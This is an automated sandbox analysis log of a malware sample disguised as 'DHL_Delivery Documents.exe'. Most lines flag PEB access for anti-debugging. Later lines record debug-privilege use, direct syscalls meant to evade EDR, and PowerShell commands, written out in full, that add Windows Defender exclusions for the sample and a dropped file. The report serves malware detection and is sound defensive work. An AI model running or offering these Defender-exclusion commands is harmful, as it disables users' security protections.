Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD866E mov eax, dword ptr fs:[00000030h] 8_2_01CD866E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4A660 mov eax, dword ptr fs:[00000030h] 8_2_01C4A660
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4A660 mov eax, dword ptr fs:[00000030h] 8_2_01C4A660
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C42674 mov eax, dword ptr fs:[00000030h] 8_2_01C42674
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E609 mov eax, dword ptr fs:[00000030h] 8_2_01C8E609
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h] 8_2_01C2260B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h] 8_2_01C2260B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h] 8_2_01C2260B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h] 8_2_01C2260B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h] 8_2_01C2260B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h] 8_2_01C2260B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h] 8_2_01C2260B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52619 mov eax, dword ptr fs:[00000030h] 8_2_01C52619
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C46620 mov eax, dword ptr fs:[00000030h] 8_2_01C46620
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C48620 mov eax, dword ptr fs:[00000030h] 8_2_01C48620
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E627 mov eax, dword ptr fs:[00000030h] 8_2_01C2E627
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1262C mov eax, dword ptr fs:[00000030h] 8_2_01C1262C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA69C0 mov eax, dword ptr fs:[00000030h] 8_2_01CA69C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A9D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A9D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A9D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A9D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A9D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h] 8_2_01C1A9D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C449D0 mov eax, dword ptr fs:[00000030h] 8_2_01C449D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDA9D3 mov eax, dword ptr fs:[00000030h] 8_2_01CDA9D3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9E9E0 mov eax, dword ptr fs:[00000030h] 8_2_01C9E9E0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C429F9 mov eax, dword ptr fs:[00000030h] 8_2_01C429F9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C429F9 mov eax, dword ptr fs:[00000030h] 8_2_01C429F9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h] 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C109AD mov eax, dword ptr fs:[00000030h] 8_2_01C109AD
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C109AD mov eax, dword ptr fs:[00000030h] 8_2_01C109AD
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C989B3 mov esi, dword ptr fs:[00000030h] 8_2_01C989B3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C989B3 mov eax, dword ptr fs:[00000030h] 8_2_01C989B3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C989B3 mov eax, dword ptr fs:[00000030h] 8_2_01C989B3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE4940 mov eax, dword ptr fs:[00000030h] 8_2_01CE4940
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C90946 mov eax, dword ptr fs:[00000030h] 8_2_01C90946
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h] 8_2_01C36962
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h] 8_2_01C36962
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h] 8_2_01C36962
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C5096E mov eax, dword ptr fs:[00000030h] 8_2_01C5096E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C5096E mov edx, dword ptr fs:[00000030h] 8_2_01C5096E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C5096E mov eax, dword ptr fs:[00000030h] 8_2_01C5096E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB4978 mov eax, dword ptr fs:[00000030h] 8_2_01CB4978
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB4978 mov eax, dword ptr fs:[00000030h] 8_2_01CB4978
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9C97C mov eax, dword ptr fs:[00000030h] 8_2_01C9C97C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E908 mov eax, dword ptr fs:[00000030h] 8_2_01C8E908
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8E908 mov eax, dword ptr fs:[00000030h] 8_2_01C8E908
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C08918 mov eax, dword ptr fs:[00000030h] 8_2_01C08918
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C08918 mov eax, dword ptr fs:[00000030h] 8_2_01C08918
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9C912 mov eax, dword ptr fs:[00000030h] 8_2_01C9C912
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA892B mov eax, dword ptr fs:[00000030h] 8_2_01CA892B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9892A mov eax, dword ptr fs:[00000030h] 8_2_01C9892A
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3E8C0 mov eax, dword ptr fs:[00000030h] 8_2_01C3E8C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE08C0 mov eax, dword ptr fs:[00000030h] 8_2_01CE08C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDA8E4 mov eax, dword ptr fs:[00000030h] 8_2_01CDA8E4
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4C8F9 mov eax, dword ptr fs:[00000030h] 8_2_01C4C8F9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4C8F9 mov eax, dword ptr fs:[00000030h] 8_2_01C4C8F9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C10887 mov eax, dword ptr fs:[00000030h] 8_2_01C10887
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9C89D mov eax, dword ptr fs:[00000030h] 8_2_01C9C89D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C22840 mov ecx, dword ptr fs:[00000030h] 8_2_01C22840
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C40854 mov eax, dword ptr fs:[00000030h] 8_2_01C40854
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C14859 mov eax, dword ptr fs:[00000030h] 8_2_01C14859
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C14859 mov eax, dword ptr fs:[00000030h] 8_2_01C14859
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA6870 mov eax, dword ptr fs:[00000030h] 8_2_01CA6870
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA6870 mov eax, dword ptr fs:[00000030h] 8_2_01CA6870
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9E872 mov eax, dword ptr fs:[00000030h] 8_2_01C9E872
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9E872 mov eax, dword ptr fs:[00000030h] 8_2_01C9E872
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9C810 mov eax, dword ptr fs:[00000030h] 8_2_01C9C810
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB483A mov eax, dword ptr fs:[00000030h] 8_2_01CB483A
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB483A mov eax, dword ptr fs:[00000030h] 8_2_01CB483A
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4A830 mov eax, dword ptr fs:[00000030h] 8_2_01C4A830
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h] 8_2_01C32835
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h] 8_2_01C32835
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h] 8_2_01C32835
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C32835 mov ecx, dword ptr fs:[00000030h] 8_2_01C32835
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h] 8_2_01C32835
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h] 8_2_01C32835
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h] 8_2_01C30BCB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h] 8_2_01C30BCB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h] 8_2_01C30BCB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h] 8_2_01C10BCD
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h] 8_2_01C10BCD
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h] 8_2_01C10BCD
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBEBD0 mov eax, dword ptr fs:[00000030h] 8_2_01CBEBD0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h] 8_2_01C18BF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h] 8_2_01C18BF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h] 8_2_01C18BF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9CBF0 mov eax, dword ptr fs:[00000030h] 8_2_01C9CBF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3EBFC mov eax, dword ptr fs:[00000030h] 8_2_01C3EBFC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20BBE mov eax, dword ptr fs:[00000030h] 8_2_01C20BBE
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20BBE mov eax, dword ptr fs:[00000030h] 8_2_01C20BBE
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC4BB0 mov eax, dword ptr fs:[00000030h] 8_2_01CC4BB0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC4BB0 mov eax, dword ptr fs:[00000030h] 8_2_01CC4BB0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC4B4B mov eax, dword ptr fs:[00000030h] 8_2_01CC4B4B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC4B4B mov eax, dword ptr fs:[00000030h] 8_2_01CC4B4B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB8B42 mov eax, dword ptr fs:[00000030h] 8_2_01CB8B42
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA6B40 mov eax, dword ptr fs:[00000030h] 8_2_01CA6B40
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA6B40 mov eax, dword ptr fs:[00000030h] 8_2_01CA6B40
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDAB40 mov eax, dword ptr fs:[00000030h] 8_2_01CDAB40
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C08B50 mov eax, dword ptr fs:[00000030h] 8_2_01C08B50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] 8_2_01CE2B57
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] 8_2_01CE2B57
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] 8_2_01CE2B57
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] 8_2_01CE2B57
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBEB50 mov eax, dword ptr fs:[00000030h] 8_2_01CBEB50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0CB7E mov eax, dword ptr fs:[00000030h] 8_2_01C0CB7E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE4B00 mov eax, dword ptr fs:[00000030h] 8_2_01CE4B00
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] 8_2_01C8EB1D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3EB20 mov eax, dword ptr fs:[00000030h] 8_2_01C3EB20
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3EB20 mov eax, dword ptr fs:[00000030h] 8_2_01C3EB20
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD8B28 mov eax, dword ptr fs:[00000030h] 8_2_01CD8B28
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD8B28 mov eax, dword ptr fs:[00000030h] 8_2_01CD8B28
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h] 8_2_01C66ACC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h] 8_2_01C66ACC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h] 8_2_01C66ACC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C10AD0 mov eax, dword ptr fs:[00000030h] 8_2_01C10AD0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C44AD0 mov eax, dword ptr fs:[00000030h] 8_2_01C44AD0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C44AD0 mov eax, dword ptr fs:[00000030h] 8_2_01C44AD0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4AAEE mov eax, dword ptr fs:[00000030h] 8_2_01C4AAEE
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4AAEE mov eax, dword ptr fs:[00000030h] 8_2_01C4AAEE
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE4A80 mov eax, dword ptr fs:[00000030h] 8_2_01CE4A80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C48A90 mov edx, dword ptr fs:[00000030h] 8_2_01C48A90
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C18AA0 mov eax, dword ptr fs:[00000030h] 8_2_01C18AA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C18AA0 mov eax, dword ptr fs:[00000030h] 8_2_01C18AA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C66AA4 mov eax, dword ptr fs:[00000030h] 8_2_01C66AA4
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] 8_2_01C16A50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] 8_2_01C16A50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] 8_2_01C16A50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] 8_2_01C16A50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] 8_2_01C16A50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] 8_2_01C16A50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] 8_2_01C16A50
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20A5B mov eax, dword ptr fs:[00000030h] 8_2_01C20A5B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20A5B mov eax, dword ptr fs:[00000030h] 8_2_01C20A5B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4CA6F mov eax, dword ptr fs:[00000030h] 8_2_01C4CA6F
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtSetInformationThread: Direct from: 0x76EF2ECC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
